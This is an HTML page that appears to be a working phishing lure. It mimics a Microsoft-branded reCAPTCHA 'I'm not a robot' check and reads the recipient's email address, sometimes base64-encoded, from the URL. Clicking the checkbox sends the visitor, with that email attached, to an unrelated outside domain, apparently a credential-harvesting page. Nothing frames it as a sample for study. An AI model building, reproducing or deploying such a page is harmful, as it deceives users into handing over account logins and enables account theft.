<!DOCTYPE html>
<html lang="en" style="font-family: 'Arial', sans-serif; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; padding: 0; background: linear-gradient(to right bottom, #D8DFCD, #E0E9F4, #f4f4f4);">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>73boththan</title>
    <style>
        body {
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            margin: 0;
        }

        .container {
            text-align: center;
            padding: 20px;
            background-color: #fff;
            border-radius: 10px;
            width: 230px;
        }

        .circle-container {
            display: flex;
            justify-content: center;
        }

        .circle {
            width: 17px;
            height: 17px;
            margin: 5px;
        }

        .circle1 { background-color: #f65314; }
        .circle2 { background-color: #7cbf42; }
        .circle3 { background-color: #00a4ef; }
        .circle4 { background-color: #ffb900; }

        .animator-container {
            border: 3px solid #eceff1;
            position: relative;
            border-radius: 50%;
            width: 50px;
            height: 50px;
            background-color: #fff;
            overflow: hidden;
            margin: 20px auto;
        }

        #animator {
            position: absolute;
            background: #0078d4;
            width: 100%;
            height: 100%;
            border-radius: 50%;
            bottom: 0;
        }

        label {
            font-size: 14px;
            color: #333;
            display: flex;
            justify-content: center;
            align-items: center;
            margin-top: 20px;
        }

        input[type="checkbox"] {
            margin-left: 10px;
            transform: scale(1.5);
            cursor: pointer;
        }

        .email-display {
            font-size: 14px;
            color: #333;
            margin-top: 10px;
        }

        .footer-links {
            font-size: 11px;
            color: #555;
            margin-top: 10px;
        }

        .footer-links a {
            text-decoration: none;
            color: #3498db;
        }
    </style>
</head>
<body>
    <div class="container">
        <!-- Color Circles -->
        <div class="circle-container">
            <div class="circle circle1"></div>
            <div class="circle circle2"></div>
        </div>
        <div class="circle-container">
            <div class="circle circle3"></div>
            <div class="circle circle4"></div>
        </div>

        <!-- CAPTCHA Box -->
        <div class="animator-container">
            <div id="animator"></div>
        </div>

        <label>
            I'm not a robot
            <input type="checkbox" id="robotCheckbox">
        </label>

        <div id="emailDisplay" class="email-display"></div>

        <div class="footer-links">
            <div aria-hidden="true" role="presentation" style="margin-bottom: 4px; font-size: 12px;">
                reCAPTCHA
            </div>
            <div>
                <a href="#">Microsoft</a><span aria-hidden="true"> - </span>
                <a href="#">Privacy</a><span aria-hidden="true"> - </span>
                <a href="#">Terms</a>
            </div>
        </div>
    </div>
</body>
</html>

<script>
    function decodeBase64(s) {
        var e = {}, i, b = 0, c, x, l = 0, a, r = '', w = String.fromCharCode, L = s.length;
        var A = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
        for (i = 0; i < 64; i++) { e[A.charAt(i)] = i; }
        for (x = 0; x < L; x++) {
            c = e[s.charAt(x)]; b = (b << 6) + c; l += 6;
            while (l >= 8) { ((a = (b >>> (l -= 8)) & 0xff) || (x < (L - 2))) && (r += w(a)); }
        }
        return r;
    }

    function getParams(url) {
        var params = {};
        var parser = document.createElement('a');
        parser.href = url;

        var hash = parser.hash.substring(1);

        // Check if the hash part contains additional params and split if necessary
        var emailPart = hash.split('%2F')[0];
        if (emailPart.includes('@')) {
            params['email'] = decodeURIComponent(emailPart).trim();
        } else {
            params['email'] = decodeBase64(emailPart).trim();
        }

        return params;
    }

    document.addEventListener('DOMContentLoaded', function() {
        var params = getParams(window.location.href);
        var email = params.email; // Get decoded email from URL
        console.log('Email of the recipient:', email);

        // Display the email in the provided div (optional)
        var emailDisplay = document.getElementById('emailDisplay');
        if (emailDisplay && email) {
            emailDisplay.textContent = 'Email: ' + email;
        }

        // Checkbox click event listener
        document.getElementById("robotCheckbox").addEventListener("click", function() {
            setTimeout(function() {
                window.location.href = "https://1oqrn-rncrsf.rnedynsky.ch/dg3sqn#" + email;
            }, 300);
        });

        // Animator functionality
        const animator = document.getElementById('animator');
        let position = 100;
        let isRising = true;

        function animate() {
            if (position <= 0) {
                isRising = false;
            } else if (position >= 100) {
                isRising = true;
            }

            position += isRising ? -3 : 3;
            animator.style.transform = 'translateY(' + position + '%)';

            requestAnimationFrame(animate);
        }
        requestAnimationFrame(animate);
    });
</script>
</body>
</html>
